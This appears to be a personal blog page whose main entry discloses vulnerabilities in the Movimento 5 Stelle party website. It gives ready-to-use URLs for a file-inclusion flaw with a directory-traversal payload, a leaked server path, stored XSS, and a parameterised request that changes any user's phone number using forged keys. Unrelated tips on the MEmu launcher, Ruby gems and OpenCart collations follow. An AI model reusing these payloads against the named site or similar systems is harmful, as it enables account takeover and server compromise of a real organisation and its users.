https://www.movimento5stelle.it | xss, stored xss, session theft, scripts errors, data leak, remote file inclusion, system compromise

https://www.movimento5stelle.it/cgi-bin/mt-4/mt-cp.cgi

File Inclusion
dodosmail.php is a bogus contact email script.

http://www.movimento5stelle.it/parlamento/segnalazioni.html
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=[any local file]
example:
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=eventi.html

archived page that shows the inclusion of an html page available on the server: http://archive.is/vHgOn

archived source of the movable type cgi (A bogus obsolete version used on the website): http://archive.is/20Uen
http://www.movimento5stelle.it/parlamento/dodosmail.php?dodosmail_header_file=../../../cgi-bin/mt-4/mt.cgi

the script can be triggered to show errors and the path
Warning: array_keys() expects parameter 1 to be array, null given in /home/httpd/html/casaleggio/beppegrillo.it/beppegrillo/movimento/parlamento/dodosmail.php on line 58

XSS
There are various xss and stored xss in the profile area.

It's possible to change the phone number even if they tried to hide it by setting the <input> as hidden (sigh).

When the xss are used there's an error, probably related to the movable type cgi.
"Can't call method &quot;id&quot; on an undefined value"

The phone number can be changed for any registered user without permissions.
https://www.movimento5stelle.it/php/load_cid.php?userID=[progressiveinteger related to the user]&m=[email]&key=[fakekey]&sms_key=[fakekey.dot.fakekey]&verify=1&telefono=[telephone with international prefix]

the fake key can be generated by using the keys genereted from a dummy/fake/working account.

____________________________________

2022 - Remove (the too many) Ads from Memu launcher

Simple method Download from pureapk "MEmu Launcher2" ex: MEmu Launcher2_v6.0.9_apkpure.com Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar) Longer method Install "Export Apk" Export the memu launcher2 Install purify https://github.com/echo-devim/purify/raw/master/Purify.apk use purify with the exported memu launcher 2 Install "System app remover" (root) remove from system apps the "memu launcher 2" import the "purified" MEmu Launcher2 apk with the Memu utility ("apk" on the right toolbar)

ruby gems system wide (get rid of local gems installation by default)

ruby gems system wide Edit /etc/gems and replace gem: --user-install with gem: --no-user-install

Database Collation when installing Opencart 3.x, 4.x

To avoid several problems the database collation for opencart should be as follows: - for Opencart 4.0.1.1 and above it should be " utf8mb4_general_ci " - for Opencart 1.5.51 (Opencart 2.x, Opencart 3.x ) up to Opencart 4.0.1.0 the collation should be " utf8_general_ci " - for Opencart 1.4.1 up to Opencart 1.5.4.1 the collation should be " utf8_bin " - for Opencart <1.1.1 up to Opencart 1.4.0 the collation should be " utf8_unicode_ci " If you are using the latest version of mysql always use " utf8mb4_general_ci ". Never use UTF8mb3*

pro(re)gress

Search This Blog